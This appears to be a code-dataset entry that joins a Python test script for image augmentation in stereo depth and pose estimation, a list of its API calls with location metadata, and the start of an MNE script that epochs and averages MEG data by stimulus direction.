for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi}: new features ~~~~~~~~~~!!")
images = []
feat_aug = total_aug.preprocess(features)
img = show_result(feat_aug, "preprocess")
images.append(img)
for name, augment in data_aug.items():
feat_aug = augment(feat_aug)
img = show_result(feat_aug, name, augment.param)
images.append(img)
feat_aug = total_aug.postprocess(features, feat_aug)
source_image, synth_target = synthesize_target(feat_aug)
images.append(synth_target)
images.append(source_image)
images = np.concatenate(images, axis=0)
cv2.imshow("augmentation", images)
ori_images = []
raw_image_u8 = to_uint8_image(features["image"])
ori_images.append(raw_image_u8[0, -opts.get_img_shape("H"):])
source_image, synth_target = synthesize_target(features)
ori_images.append(synth_target)
ori_images.append(source_image)
ori_images = np.concatenate(ori_images, axis=0)
cv2.imshow("original image", ori_images)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
def show_result(features, name, param=""):
print(f"----- augmentation: {name}")
print("parameter:", param)
image_u8 = to_uint8_image(features["image5d"])
target_index = opts.SNIPPET_LEN - 1
target = image_u8[target_index].numpy()
intrin = features["intrinsic"]
print("intrinsic:\n", intrin[0].numpy())
pose = features["pose_gt"]
print("pose:\n", pose[0, 0].numpy())
return target
def synthesize_target(features):
sources, target, intrinsic, depth_gt_ms, pose_gt = prep_synthesize(features)
synth_target_ms = SynthesizeMultiScale()(sources, intrinsic, depth_gt_ms, pose_gt)
synth_u8 = to_uint8_image(synth_target_ms[0])
synth_u8 = synth_u8[0, 0].numpy()
source_u8 = to_uint8_image(sources)
source_u8 = source_u8[0, 0].numpy()
return source_u8, synth_u8
def prep_synthesize(features):
image5d = features["image5d"]
sources = image5d[:, :-1]
target = image5d[:, -1]
intrinsic = features["intrinsic"]
pose_gt = features["pose_gt"]
pose_gt = pose_matr2rvec_batch(pose_gt)
depth_gt = features["depth_gt"]
depth_gt_ms = multi_scale_depths(depth_gt, [1, 2, 4, 8])
return sources, target, intrinsic, depth_gt_ms, pose_gt
def test_augmentation_factory():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
augmenter = augmentation_factory(opts.AUGMENT_PROBS)
for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi}: new features ~~~~~~~~~~!!")
print(features.keys())
print("before augment features:")
fkeys = list(features.keys())
for i in range(np.ceil(len(features.keys())/5.).astype(int)):
print(fkeys[i*5:(i+1)*5])
feat_aug = augmenter(features)
print("after augment features:")
fkeys = list(feat_aug.keys())
for i in range(np.ceil(len(feat_aug.keys())/5.).astype(int)):
print(fkeys[i*5:(i+1)*5])
image = to_uint8_image(features["image5d_R"][1])
image_aug = to_uint8_image(feat_aug["image5d_R"][1])
snippet, height, width, chann = image.get_shape()
image = image.numpy().reshape(-1, width, chann)
image_aug = image_aug.numpy().reshape(-1, width, chann)
image = np.concatenate([image, image_aug], axis=1)
cv2.imshow("image vs augmented", image)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
import utils.util_funcs as uf
def test_stereo_augmentation():
print("===== test test_augmentations")
tfrgen = TfrecordReader(op.join(opts.DATAPATH_TFR, "kitti_raw_test"), shuffle=False)
dataset = tfrgen.get_dataset()
augmenter = augmentation_factory(opts.AUGMENT_PROBS)
batidx, sclidx = 0, 0
for bi, features in enumerate(dataset):
print(f"\n!!~~~~~~~~~~ {bi} step ~~~~~~~~~~!!")
view_imgs = dict()
feat_aug = augmenter(features)
pose_T_RL = tf.linalg.inv(feat_aug["stereo_T_LR"])
pose_T_RL = cp.pose_matr2rvec_batch(tf.expand_dims(pose_T_RL, 1))
right_target = tf.expand_dims(feat_aug["image5d_R"][:, -1], 1)
depth_ms = uf.multi_scale_depths(feat_aug["depth_gt"], [1, 2, 4, 8])
synth_stereo_left = SynthesizeMultiScale()(source_image=right_target,
intrinsic=feat_aug["intrinsic"],
pred_depth_ms=depth_ms,
pred_pose=pose_T_RL)
view_imgs["raw_left_target"] = features["image5d"][batidx, -1]
view_imgs["raw_right_target"] = features["image5d_R"][batidx, -1]
view_imgs["aug_left_target_orig"] = feat_aug["image5d"][batidx, -1]
view_imgs["aug_left_target_synt"] = synth_stereo_left[sclidx][batidx, 0]
view_imgs["aug_right_target"] = feat_aug["image5d_R"][batidx, -1]
view = uf.stack_titled_images(view_imgs)
cv2.imshow("stereo synthesis", view)
key = cv2.waitKey()
if key == ord('q'):
break
cv2.destroyAllWindows()
if __name__ == "__main__":
test_random_crop_boxes()
test_adjust_intrinsic()
test_flip_pose_np()
test_flip_pose_tf()
test_flip_intrinsic()
test_augmentations()
test_augmentation_factory()
test_stereo_augmentation()
|
[
"tensorflow.image.flip_left_right",
"tensorflow.clip_by_value",
"tensorflow.reshape",
"tensorflow.image.crop_and_resize",
"numpy.isclose",
"tensorflow.linalg.inv",
"numpy.linalg.norm",
"utils.convert_pose.pose_rvec2matr_batch_tf",
"cv2.imshow",
"os.path.join",
"tensorflow.abs",
"tensorflow.random.uniform",
"numpy.identity",
"tensorflow.concat",
"tensorflow.stack",
"tensorflow.cast",
"config.opts.get_img_shape",
"cv2.destroyAllWindows",
"tensorflow.image.adjust_saturation",
"tensorflow.range",
"utils.util_funcs.to_uint8_image",
"cv2.waitKey",
"tensorflow.constant",
"tensorflow.tile",
"model.synthesize.synthesize_base.SynthesizeMultiScale",
"numpy.linalg.inv",
"utils.convert_pose.pose_rvec2matr",
"tensorflow.image.adjust_gamma",
"utils.util_funcs.multi_scale_depths",
"numpy.concatenate",
"tensorflow.expand_dims",
"numpy.random.uniform",
"utils.util_funcs.stack_titled_images",
"utils.convert_pose.pose_matr2rvec_batch",
"utils.convert_pose.pose_matr2rvec",
"numpy.array",
"utils.util_class.WrongInputException",
"numpy.matmul"
] |
[((9665, 9711), 'tensorflow.constant', 'tf.constant', (['[height, width]'], {'dtype': 'tf.float32'}), '([height, width], dtype=tf.float32)\n', (9676, 9711), True, 'import tensorflow as tf\n'), ((9728, 9832), 'tensorflow.constant', 'tf.constant', (['[[[width / 2, 0, width / 2], [0, height / 2, height / 2], [0, 0, 1]]]'], {'dtype': 'tf.float32'}), '([[[width / 2, 0, width / 2], [0, height / 2, height / 2], [0, 0,\n 1]]], dtype=tf.float32)\n', (9739, 9832), True, 'import tensorflow as tf\n'), ((9837, 9870), 'tensorflow.tile', 'tf.tile', (['intrinsic', '[batch, 1, 1]'], {}), '(intrinsic, [batch, 1, 1])\n', (9844, 9870), True, 'import tensorflow as tf\n'), ((10308, 10368), 'numpy.isclose', 'np.isclose', (['intrin_adj[0, 0, 0]', '(width / 2 / (1 - 2 * xcrop))'], {}), '(intrin_adj[0, 0, 0], width / 2 / (1 - 2 * xcrop))\n', (10318, 10368), True, 'import numpy as np\n'), ((10458, 10500), 'numpy.isclose', 'np.isclose', (['intrin_adj[0, 0, 2]', '(width / 2)'], {}), '(intrin_adj[0, 0, 2], width / 2)\n', (10468, 10500), True, 'import numpy as np\n'), ((10709, 10745), 'numpy.random.uniform', 'np.random.uniform', (['(-2)', '(2)', '(batch, 6)'], {}), '(-2, 2, (batch, 6))\n', (10726, 10745), True, 'import numpy as np\n'), ((10761, 10788), 'utils.convert_pose.pose_rvec2matr', 'cp.pose_rvec2matr', (['pose_vec'], {}), '(pose_vec)\n', (10778, 10788), True, 'import utils.convert_pose as cp\n'), ((10800, 10814), 'numpy.identity', 'np.identity', (['(4)'], {}), '(4)\n', (10811, 10814), True, 'import numpy as np\n'), ((10966, 10998), 'utils.convert_pose.pose_matr2rvec', 'cp.pose_matr2rvec', (['pose_mat_flip'], {}), '(pose_mat_flip)\n', (10983, 10998), True, 'import utils.convert_pose as cp\n'), ((11418, 11469), 'numpy.array', 'np.array', (['[[-1, 1, 1, 1, -1, -1]]'], {'dtype': 'np.float32'}), '([[-1, 1, 1, 1, -1, -1]], dtype=np.float32)\n', (11426, 11469), True, 'import numpy as np\n'), ((11683, 11727), 'tensorflow.random.uniform', 'tf.random.uniform', (['(batch, numsrc, 6)', '(-2)', '(2)'], {}), '((batch, numsrc, 6), -2, 2)\n', (11700, 11727), True, 'import tensorflow as tf\n'), ((11743, 11779), 'utils.convert_pose.pose_rvec2matr_batch_tf', 'cp.pose_rvec2matr_batch_tf', (['pose_vec'], {}), '(pose_vec)\n', (11769, 11779), True, 'import utils.convert_pose as cp\n'), ((11882, 11920), 'utils.convert_pose.pose_matr2rvec_batch', 'cp.pose_matr2rvec_batch', (['pose_mat_flip'], {}), '(pose_mat_flip)\n', (11905, 11920), True, 'import utils.convert_pose as cp\n'), ((12408, 12466), 'tensorflow.constant', 'tf.constant', (['[[[[-1, 1, 1, 1, -1, -1]]]]'], {'dtype': 'tf.float32'}), '([[[[-1, 1, 1, 1, -1, -1]]]], dtype=tf.float32)\n', (12419, 12466), True, 'import tensorflow as tf\n'), ((12793, 12849), 'tensorflow.random.uniform', 'tf.random.uniform', (['(batch, 3, 3)'], {'minval': '(100)', 'maxval': '(200)'}), '((batch, 3, 3), minval=100, maxval=200)\n', (12810, 12849), True, 'import tensorflow as tf\n'), ((15635, 15658), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (15656, 15658), False, 'import cv2\n'), ((15791, 15826), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image5d']"], {}), "(features['image5d'])\n", (15805, 15826), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16299, 16333), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (['synth_target_ms[0]'], {}), '(synth_target_ms[0])\n', (16313, 16333), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16388, 16411), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (['sources'], {}), '(sources)\n', (16402, 16411), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((16694, 16723), 'utils.convert_pose.pose_matr2rvec_batch', 'pose_matr2rvec_batch', (['pose_gt'], {}), '(pose_gt)\n', (16714, 16723), False, 'from utils.convert_pose import pose_matr2rvec_batch\n'), ((16778, 16820), 'utils.util_funcs.multi_scale_depths', 'multi_scale_depths', (['depth_gt', '[1, 2, 4, 8]'], {}), '(depth_gt, [1, 2, 4, 8])\n', (16796, 16820), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((18180, 18203), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (18201, 18203), False, 'import cv2\n'), ((19828, 19851), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (19849, 19851), False, 'import cv2\n'), ((1624, 1664), 'tensorflow.reshape', 'tf.reshape', (["features['image5d']", 'imshape'], {}), "(features['image5d'], imshape)\n", (1634, 1664), True, 'import tensorflow as tf\n'), ((2708, 2736), 'tensorflow.constant', 'tf.constant', (['[height, width]'], {}), '([height, width])\n', (2719, 2736), True, 'import tensorflow as tf\n'), ((2759, 2778), 'tensorflow.range', 'tf.range', (['(0)', 'nimage'], {}), '(0, nimage)\n', (2767, 2778), True, 'import tensorflow as tf\n'), ((2887, 2963), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['image5d']", 'boxes', 'box_indices', 'crop_size'], {}), "(features['image5d'], boxes, box_indices, crop_size)\n", (2911, 2963), True, 'import tensorflow as tf\n'), ((3872, 3915), 'tensorflow.random.uniform', 'tf.random.uniform', (['(1, 2)', 'minval1', 'maxval1'], {}), '((1, 2), minval1, maxval1)\n', (3889, 3915), True, 'import tensorflow as tf\n'), ((3931, 3959), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['y1x1', '(0)', '(1)'], {}), '(y1x1, 0, 1)\n', (3947, 3959), True, 'import tensorflow as tf\n'), ((4037, 4080), 'tensorflow.random.uniform', 'tf.random.uniform', (['(1, 2)', 'minval2', 'maxval2'], {}), '((1, 2), minval2, maxval2)\n', (4054, 4080), True, 'import tensorflow as tf\n'), ((4096, 4124), 'tensorflow.clip_by_value', 'tf.clip_by_value', (['y2x2', '(0)', '(1)'], {}), '(y2x2, 0, 1)\n', (4112, 4124), True, 'import tensorflow as tf\n'), ((4224, 4255), 'tensorflow.concat', 'tf.concat', (['[y1x1, y2x2]'], {'axis': '(1)'}), '([y1x1, y2x2], axis=1)\n', (4233, 4255), True, 'import tensorflow as tf\n'), ((4302, 4330), 'tensorflow.tile', 'tf.tile', (['boxes', '[num_box, 1]'], {}), '(boxes, [num_box, 1])\n', (4309, 4330), True, 'import tensorflow as tf\n'), ((4647, 4674), 'tensorflow.cast', 'tf.cast', (['imsize', 'tf.float32'], {}), '(imsize, tf.float32)\n', (4654, 4674), True, 'import tensorflow as tf\n'), ((5270, 5369), 'tensorflow.stack', 'tf.stack', (['[intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio, intrin_crop[:, 2]]'], {'axis': '(1)'}), '([intrin_crop[:, 0] * x_ratio, intrin_crop[:, 1] * y_ratio,\n intrin_crop[:, 2]], axis=1)\n', (5278, 5369), True, 'import tensorflow as tf\n'), ((5623, 5644), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {}), '(())\n', (5640, 5644), True, 'import tensorflow as tf\n'), ((5954, 5999), 'tensorflow.image.flip_left_right', 'tf.image.flip_left_right', (["features['image5d']"], {}), "(features['image5d'])\n", (5978, 5999), True, 'import tensorflow as tf\n'), ((6988, 7058), 'tensorflow.constant', 'tf.constant', (['[[[0, 0, width], [0, 0, 0], [0, 0, 0]]]'], {'dtype': 'tf.float32'}), '([[[0, 0, width], [0, 0, 0], [0, 0, 0]]], dtype=tf.float32)\n', (6999, 7058), True, 'import tensorflow as tf\n'), ((7081, 7110), 'tensorflow.abs', 'tf.abs', (['(intrin_wh - intrinsic)'], {}), '(intrin_wh - intrinsic)\n', (7087, 7110), True, 'import tensorflow as tf\n'), ((7190, 7286), 'tensorflow.constant', 'tf.constant', (['[[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]]'], {'dtype': 'tf.float32'}), '([[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]],\n dtype=tf.float32)\n', (7201, 7286), True, 'import tensorflow as tf\n'), ((7508, 7602), 'tensorflow.constant', 'tf.constant', (['[[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]]'], {'dtype': 'tf.float32'}), '([[[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]],\n dtype=tf.float32)\n', (7519, 7602), True, 'import tensorflow as tf\n'), ((7906, 7927), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {}), '(())\n', (7923, 7927), True, 'import tensorflow as tf\n'), ((7944, 7989), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {'minval': '(0.5)', 'maxval': '(1.5)'}), '((), minval=0.5, maxval=1.5)\n', (7961, 7989), True, 'import tensorflow as tf\n'), ((8011, 8056), 'tensorflow.random.uniform', 'tf.random.uniform', (['()'], {'minval': '(0.5)', 'maxval': '(1.5)'}), '((), minval=0.5, maxval=1.5)\n', (8028, 8056), True, 'import tensorflow as tf\n'), ((8861, 8906), 'tensorflow.image.adjust_saturation', 'tf.image.adjust_saturation', (['image', 'saturation'], {}), '(image, saturation)\n', (8887, 8906), True, 'import tensorflow as tf\n'), ((8923, 8974), 'tensorflow.image.adjust_gamma', 'tf.image.adjust_gamma', (['image'], {'gamma': 'gamma', 'gain': '(1.0)'}), '(image, gamma=gamma, gain=1.0)\n', (8944, 8974), True, 'import tensorflow as tf\n'), ((9062, 9099), 'tensorflow.stack', 'tf.stack', (['[gamma, saturation]'], {'axis': '(0)'}), '([gamma, saturation], axis=0)\n', (9070, 9099), True, 'import tensorflow as tf\n'), ((9997, 10048), 'tensorflow.constant', 'tf.constant', (['[[ycrop, xcrop, 1 - ycrop, 1 - xcrop]]'], {}), '([[ycrop, xcrop, 1 - ycrop, 1 - xcrop]])\n', (10008, 10048), True, 'import tensorflow as tf\n'), ((10898, 10923), 'numpy.matmul', 'np.matmul', (['flip', 'pose_mat'], {}), '(flip, pose_mat)\n', (10907, 10923), True, 'import numpy as np\n'), ((10925, 10944), 'numpy.linalg.inv', 'np.linalg.inv', (['flip'], {}), '(flip)\n', (10938, 10944), True, 'import numpy as np\n'), ((11199, 11238), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec[:, 3:]'], {'axis': '(1)'}), '(pose_vec[:, 3:], axis=1)\n', (11213, 11238), True, 'import numpy as np\n'), ((11285, 11329), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec_flip[:, 3:]'], {'axis': '(1)'}), '(pose_vec_flip[:, 3:], axis=1)\n', (11299, 11329), True, 'import numpy as np\n'), ((11365, 11400), 'numpy.isclose', 'np.isclose', (['pose_vec', 'pose_vec_flip'], {}), '(pose_vec, pose_vec_flip)\n', (11375, 11400), True, 'import numpy as np\n'), ((12155, 12197), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec[:, :, 3:]'], {'axis': '(1)'}), '(pose_vec[:, :, 3:], axis=1)\n', (12169, 12197), True, 'import numpy as np\n'), ((12260, 12307), 'numpy.linalg.norm', 'np.linalg.norm', (['pose_vec_flip[:, :, 3:]'], {'axis': '(1)'}), '(pose_vec_flip[:, :, 3:], axis=1)\n', (12274, 12307), True, 'import numpy as np\n'), ((12343, 12390), 'numpy.isclose', 'np.isclose', (['pose_vec[1, 1]', 'pose_vec_flip[1, 1]'], {}), '(pose_vec[1, 1], pose_vec_flip[1, 1])\n', (12353, 12390), True, 'import numpy as np\n'), ((14115, 14159), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", (14122, 14159), True, 'import os.path as op\n'), ((15079, 15109), 'numpy.concatenate', 'np.concatenate', (['images'], {'axis': '(0)'}), '(images, axis=0)\n', (15093, 15109), True, 'import numpy as np\n'), ((15118, 15152), 'cv2.imshow', 'cv2.imshow', (['"""augmentation"""', 'images'], {}), "('augmentation', images)\n", (15128, 15152), False, 'import cv2\n'), ((15201, 15234), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image']"], {}), "(features['image'])\n", (15215, 15234), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((15471, 15505), 'numpy.concatenate', 'np.concatenate', (['ori_images'], {'axis': '(0)'}), '(ori_images, axis=0)\n', (15485, 15505), True, 'import numpy as np\n'), ((15514, 15554), 'cv2.imshow', 'cv2.imshow', (['"""original image"""', 'ori_images'], {}), "('original image', ori_images)\n", (15524, 15554), False, 'import cv2\n'), ((15570, 15583), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (15581, 15583), False, 'import cv2\n'), ((16219, 16241), 'model.synthesize.synthesize_base.SynthesizeMultiScale', 'SynthesizeMultiScale', ([], {}), '()\n', (16239, 16241), False, 'from model.synthesize.synthesize_base import SynthesizeMultiScale\n'), ((16987, 17031), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", (16994, 17031), True, 'import os.path as op\n'), ((17714, 17754), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["features['image5d_R'][1]"], {}), "(features['image5d_R'][1])\n", (17728, 17754), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((17775, 17815), 'utils.util_funcs.to_uint8_image', 'to_uint8_image', (["feat_aug['image5d_R'][1]"], {}), "(feat_aug['image5d_R'][1])\n", (17789, 17815), False, 'from utils.util_funcs import to_uint8_image, multi_scale_depths\n'), ((18010, 18052), 'numpy.concatenate', 'np.concatenate', (['[image, image_aug]'], {'axis': '(1)'}), '([image, image_aug], axis=1)\n', (18024, 18052), True, 'import numpy as np\n'), ((18061, 18100), 'cv2.imshow', 'cv2.imshow', (['"""image vs augmented"""', 'image'], {}), "('image vs augmented', image)\n", (18071, 18100), False, 'import cv2\n'), ((18115, 18128), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (18126, 18128), False, 'import cv2\n'), ((18341, 18385), 'os.path.join', 'op.join', (['opts.DATAPATH_TFR', '"""kitti_raw_test"""'], {}), "(opts.DATAPATH_TFR, 'kitti_raw_test')\n", (18348, 18385), True, 'import os.path as op\n'), ((18708, 18746), 'tensorflow.linalg.inv', 'tf.linalg.inv', (["feat_aug['stereo_T_LR']"], {}), "(feat_aug['stereo_T_LR'])\n", (18721, 18746), True, 'import tensorflow as tf\n'), ((18844, 18891), 'tensorflow.expand_dims', 'tf.expand_dims', (["feat_aug['image5d_R'][:, -1]", '(1)'], {}), "(feat_aug['image5d_R'][:, -1], 1)\n", (18858, 18891), True, 'import tensorflow as tf\n'), ((18911, 18968), 'utils.util_funcs.multi_scale_depths', 'uf.multi_scale_depths', (["feat_aug['depth_gt']", '[1, 2, 4, 8]'], {}), "(feat_aug['depth_gt'], [1, 2, 4, 8])\n", (18932, 18968), True, 'import utils.util_funcs as uf\n'), ((19670, 19703), 'utils.util_funcs.stack_titled_images', 'uf.stack_titled_images', (['view_imgs'], {}), '(view_imgs)\n', (19692, 19703), True, 'import utils.util_funcs as uf\n'), ((19712, 19748), 'cv2.imshow', 'cv2.imshow', (['"""stereo synthesis"""', 'view'], {}), "('stereo synthesis', view)\n", (19722, 19748), False, 'import cv2\n'), ((19763, 19776), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (19774, 19776), False, 'import cv2\n'), ((1737, 1779), 'tensorflow.reshape', 'tf.reshape', (["features['image5d_R']", 'imshape'], {}), "(features['image5d_R'], imshape)\n", (1747, 1779), True, 'import tensorflow as tf\n'), ((3131, 3209), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['image5d_R']", 'boxes', 'box_indices', 'crop_size'], {}), "(features['image5d_R'], boxes, box_indices, crop_size)\n", (3155, 3209), True, 'import tensorflow as tf\n'), ((3440, 3556), 'tensorflow.image.crop_and_resize', 'tf.image.crop_and_resize', (["features['depth_gt']", 'boxes[:batch]', 'box_indices[:batch]', 'crop_size'], {'method': '"""nearest"""'}), "(features['depth_gt'], boxes[:batch], box_indices[:\n batch], crop_size, method='nearest')\n", (3464, 3556), True, 'import tensorflow as tf\n'), ((6072, 6119), 'tensorflow.image.flip_left_right', 'tf.image.flip_left_right', (["features['image5d_R']"], {}), "(features['image5d_R'])\n", (6096, 6119), True, 'import tensorflow as tf\n'), ((7405, 7426), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['T_flip'], {}), '(T_flip)\n', (7418, 7426), True, 'import tensorflow as tf\n'), ((7699, 7720), 'tensorflow.linalg.inv', 'tf.linalg.inv', (['T_flip'], {}), '(T_flip)\n', (7712, 7720), True, 'import tensorflow as tf\n'), ((11481, 11527), 'numpy.isclose', 'np.isclose', (['pose_vec', '(pose_vec_flip * flip_vec)'], {}), '(pose_vec, pose_vec_flip * flip_vec)\n', (11491, 11527), True, 'import numpy as np\n'), ((13146, 13194), 'numpy.isclose', 'np.isclose', (['intrinsic[:, 1:]', 'intrin_flip[:, 1:]'], {}), '(intrinsic[:, 1:], intrin_flip[:, 1:])\n', (13156, 13194), True, 'import numpy as np\n'), ((13301, 13355), 'numpy.isclose', 'np.isclose', (['intrinsic[:, 0, :2]', 'intrin_flip[:, 0, :2]'], {}), '(intrinsic[:, 0, :2], intrin_flip[:, 0, :2])\n', (13311, 13355), True, 'import numpy as np\n'), ((13472, 13532), 'numpy.isclose', 'np.isclose', (['(width - intrinsic[:, 0, 2])', 'intrin_flip[:, 0, 2]'], {}), '(width - intrinsic[:, 0, 2], intrin_flip[:, 0, 2])\n', (13482, 13532), True, 'import numpy as np\n'), ((18791, 18819), 'tensorflow.expand_dims', 'tf.expand_dims', (['pose_T_RL', '(1)'], {}), '(pose_T_RL, 1)\n', (18805, 18819), True, 'import tensorflow as tf\n'), ((18997, 19019), 'model.synthesize.synthesize_base.SynthesizeMultiScale', 'SynthesizeMultiScale', ([], {}), '()\n', (19017, 19019), False, 'from model.synthesize.synthesize_base import SynthesizeMultiScale\n'), ((4807, 4860), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, boxes[0, 1] * imsize[1]]'], {'axis': '(0)'}), '([0.0, 0.0, boxes[0, 1] * imsize[1]], axis=0)\n', (4815, 4860), True, 'import tensorflow as tf\n'), ((4892, 4945), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, boxes[0, 0] * imsize[0]]'], {'axis': '(0)'}), '([0.0, 0.0, boxes[0, 0] * imsize[0]], axis=0)\n', (4900, 4945), True, 'import tensorflow as tf\n'), ((4977, 5010), 'tensorflow.stack', 'tf.stack', (['[0.0, 0.0, 0.0]'], {'axis': '(0)'}), '([0.0, 0.0, 0.0], axis=0)\n', (4985, 5010), True, 'import tensorflow as tf\n'), ((504, 558), 'utils.util_class.WrongInputException', 'WrongInputException', (['f"""Wrong augmentation type: {key}"""'], {}), "(f'Wrong augmentation type: {key}')\n", (523, 558), False, 'from utils.util_class import WrongInputException\n'), ((8283, 8320), 'tensorflow.constant', 'tf.constant', (['[0, 0]'], {'dtype': 'tf.float32'}), '([0, 0], dtype=tf.float32)\n', (8294, 8320), True, 'import tensorflow as tf\n'), ((8627, 8664), 'tensorflow.constant', 'tf.constant', (['[0, 0]'], {'dtype': 'tf.float32'}), '([0, 0], dtype=tf.float32)\n', (8638, 8664), True, 'import tensorflow as tf\n'), ((15278, 15301), 'config.opts.get_img_shape', 'opts.get_img_shape', (['"""H"""'], {}), "('H')\n", (15296, 15301), False, 'from config import opts\n')]
|
# contrast activity contrast back lr
import os
import mne
from mne.io import read_raw_fif
import numpy
import numpy as np
import matplotlib.pyplot as plt
import os.path as op
from operator import itemgetter
from mne.io import Raw
from mne.io import read_raw_ctf
from mne.preprocessing import ICA
from mne.viz import plot_evoked_topo
from mne.minimum_norm import apply_inverse
import math
import matplotlib
from mne.viz import topomap
from mpl_toolkits.axes_grid1 import make_axes_locatable
from mne.stats import permutation_t_test
from mne.stats import permutation_cluster_1samp_test
from mne.stats import (spatio_temporal_cluster_1samp_test, summarize_clusters_stc)
from mne.viz import plot_topomap
list_data_back = []
list_data_left = []
list_data_right = []
list_data_front = []
list_data_tfpc = []
list_data_ttpc = []
for ith_sub in list(range(2, 14)):
temp_data_array = "/Users/boo/Desktop/MEG_data_script/PreProcessed_data/artefact_removed_sub" + str(
ith_sub) + "_raw_100hz_sfre_100.fif"
temp_event_array = "/Users/boo/Desktop/MEG_data_script/PreProcessed_data/events_post_resample_sub" + str(
ith_sub) + "_100hz_sfre_100.npy"
array_data = read_raw_fif(temp_data_array)
array_event = numpy.load(temp_event_array)
# pick channel
all_chan = array_data.ch_names
picks_mag = mne.pick_types(array_data.info, meg='mag')
meg_channel = itemgetter(*picks_mag)(all_chan)
meg_channel = meg_channel[29:301]
pos = mne.channels.layout._find_topomap_coords(array_data.info, picks_mag[29:301])
# Compute epochs
min_onset = -0.2
max_endpoint = 2
baseline = (min_onset, 0)
event_id_back = {'back': 80}
event_id_front = {'front': 90}
event_id_left = {'left': 82}
event_id_right = {'right': 84}
event_id_tfpc = {'tfpc': 110}
event_id_ttpc = {'ttpc': 100}
epochs_back = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_back, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_front = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_front, tmin=min_onset,
tmax=max_endpoint, baseline=baseline)
epochs_left = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_left, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_right = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_right, tmin=min_onset,
tmax=max_endpoint, baseline=baseline)
epochs_tfpc = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_tfpc, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_ttpc = mne.Epochs(array_data, array_event, picks=meg_channel, event_id=event_id_ttpc, tmin=min_onset, tmax=max_endpoint,
baseline=baseline)
epochs_back.load_data()
epochs_front.load_data()
epochs_left.load_data()
epochs_right.load_data()
epochs_tfpc.load_data()
epochs_ttpc.load_data()
evoke_back = epochs_back.average()
evoke_front = epochs_front.average()
evoke_left = epochs_left.average()
evoke_right = epochs_right.average()
evoke_tfpc = epochs_tfpc.average()
evoke_ttpc = epochs_ttpc.average()
# add into list
list_data_back.append(evoke_back.data)
list_data_front.append(evoke_front.data)
list_data_left.append(evoke_left.data)
list_data_right.append(evoke_right.data)
list_data_tfpc.append(evoke_tfpc.data)
list_data_ttpc.append(evoke_ttpc.data)
array_back = np.array(list_data_back)
array_left = np.array(list_data_left)
array_right = np.array(list_data_right)
array_front = np.array(list_data_front)
array_tfpc = np.array(list_data_tfpc)
array_ttpc = np.array(list_data_ttpc)
onset_t = 0
end_point = 220
segm = 3
num_dp = np.shape(array_back)[2]
resampled_ima_t_f = np.zeros([array_front.shape[0], array_front.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_b = np.zeros([array_back.shape[0], array_back.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_l = np.zeros([array_left.shape[0], array_left.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_r = np.zeros([array_right.shape[0], array_right.shape[1], len(np.arange(onset_t, end_point, segm))])
resampled_ima_t_fpc = np.zeros([array_tfpc.shape[0], array_tfpc.shape[1], len(np.arange(onset_t, end_point, segm))])
